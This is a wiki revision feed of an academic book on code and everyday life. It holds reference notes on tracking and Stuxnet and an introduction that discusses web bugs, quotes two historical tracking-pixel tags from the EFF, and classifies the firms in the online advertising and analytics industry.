&lt;br /&gt;
Pew (2012) 'Search Engine Use 2012', accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) 'So What Do We Do With All This Data?', _The Smithsonian_, accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sanger, D. E. (2012) Obama Order Sped Up Wave of Cyberattacks Against Iran, The New York Times, June 1, 2012, accessed 02/06/2012, http://www.nytimes.com/2012/06/01/world/middleeast/obama-ordered-wave-of-cyberattacks-against-iran.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) 'Feel. Act. Make sense', accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) 'Bad Habits? My Future Self Will Deal With That', accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wauters, R (2012) '427 million Europeans are now online, 37% uses more than one device: IAB', The Next Web, accessed 01/06/2012, http://thenextweb.com/eu/2012/05/31/427-million-europeans-are-now-online-37-uses-more-than-one-device-iab/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) 'Tracking Protection Working Group', accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) 'The Personal Analytics of My Life', accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) 'CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth', ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) 'Blockbuster Worm Aimed for Infrastructure', But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) 'Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant', ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies and Locally Stored Objects (LSOs) and document object model storage (DOM Storage) &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal, 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: 'Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity' (Ghostery, 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code that was disassembled from the worm and the careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, this was then matched by Ralph Langner with photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, and confirmed the importance of the cascade structure, centrifuge layout and the enriching process by careful analysis of the accidental photographing of background images on computers used by the president see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was on 03/02/2010 (Matrosov et al., n.d.). Although there is suspicion that there may be three versions of the Stuxnet code in response to its discovery: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] Although there are some criticisms that this link may be spurious. For instance, Cryptome (2010) argues: It may be that the 'myrtus' string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post.&amp;amp;nbsp;I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier.&amp;amp;nbsp;I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] Computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4994</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4994"/>
		<updated>2012-06-21T11:12:01Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology, made up of disparate software ecologies, that we inhabit. As such we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. That is, we live in a world where computational concepts and ideas are foundational, or ontological, what I call ''computationality''. Here, code and software become the paradigmatic forms of knowing and doing - to the extent that other candidates for this role, such as air, the economy, evolution, the environment, satellites, and so forth, are understood and explained through computational concepts and categories.&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
The deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has been highly successful in penetrating more and more into the lifeworld. Digital code/software has created, and continues to create, specific tensions in relation to old media forms, such as the disruption it has produced in the print, music and film industries, as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. It is a potential that is understood as relating to the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate, often theorised as a form of network politics. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
I want to understand the ecology in computational ecology here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. For example, 427 million Europeans (or 65 percent) use the Internet and more than 9 in 10 European Internet users reading news online (Wauters, 2012). These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers it.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These computational devices, particularly mobile forms, also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life continues to expand driven by the network effects of digital media. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane (see, for example, Hall, 2011).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences. Code/software are the materialisation of computationality, in that they are the medium through which structural features of computation&amp;amp;nbsp;are realised and mediated. For example, code/software disconnects the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system (see also Parikka, 2012). Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, and I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacra lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. 
That is, the material form of code/software is difficult to theorise and understand due to its perceived invisibility or ethereality, yet nonetheless having concrete effects. This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangular squares which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. Although it is useful to note that theorists, such as Frabetti (2010), problematise Hayles' understanding of code, print, and materiality.&amp;lt;br&amp;gt;&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomena of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, and send various information about the user back to their servers.&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were designed to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and collect data and information about users raises important privacy implications, but it also facilitates the rise of so-called behaviour marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company] it is described as:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code run in the browser without the knowledge of the user, which if it should be observed, looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999):&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;(http://ad.doubleclick.net/ad/pixel.quicken/NEW)&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;(http://media.preferences.com/ping?&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any) &amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;group=register&amp;amp;amp; time=1999.10.27.20.5 6.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on the web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)', the data is not shared with third parties but no information is given on their data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012).&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions (see Parry, 2011). Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor to each website at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) is generating $189 per user, at [http://www.businessinsider.com/blackboard/google Google] (search) it is generating $24 per user, and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011).&amp;amp;nbsp; Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becomong extremely profitable. 
Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into five main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services:&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers. (web site operators) Example: [http://www.burstmedia.com/ Burst Media] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitor when they place ads on third party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Verification/Privacy Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Verification: Certifies or classifies webpages in an effort to prevent advertisers’ campaigns from running on unsavory or blocked content, and/or protects advertisers from having other companies run their ads incorrectly. &amp;amp;nbsp;Example: [http://www.clickforensics.com/ ClickForensics] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Privacy: Technology providers that deliver information and transparency to consumers on how 3rd party companies gather and use their data. Example: [http://www.betteradvertising.com/ Better Advertising]&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &amp;lt;br&amp;gt; [[Image:LUMAadvertising.jpg|left|500x450px|Image 1: Display Advertising Technology Landscape (Luma, 2012)]] ''Image 1: Display Advertising Technology Landscape (Luma, 2012)''&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &amp;lt;br&amp;gt; &amp;lt;br&amp;gt; Ghostery gives a useful explanation of how these companies interoperate to perform a variety of services for advertising and marketing clients: &amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;A company like [http://www.turn.com/ Turn Media] is a technology provider that allows marketers to buy inventory across multiple platforms or exchanges, or a Demand-Side Platform. They provide services for marketers and agencies to centrally manage buying, planning, targeting, and optimizing media opportunities. Reasonably speaking, however, you could also technically classify them as an Optimizer because this process is included under the umbrella of the platform. Turn [Media] is deeply data driven and partners with multiple data providers including [http://www.bluekai.com/ BlueKai], [http://www.targusinfo.com/ TargusInfo], [http://www.exelate.com/new/index.html eXelate], and others (Ghostery, 2010). &amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
